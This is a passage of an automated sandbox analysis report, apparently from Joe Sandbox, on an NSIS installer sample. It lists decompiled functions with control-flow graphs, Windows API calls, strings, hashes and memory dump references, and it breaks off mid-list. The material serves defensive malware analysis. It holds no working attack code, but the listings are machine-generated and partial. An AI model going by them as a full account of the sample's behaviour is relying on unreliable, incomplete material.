                                                                                                                                                                                                                                                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                        Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNELBASE(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                        • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                        • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                        Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                        • String ID: jF
                                                                                                                                                                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                        Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                        • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                        Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
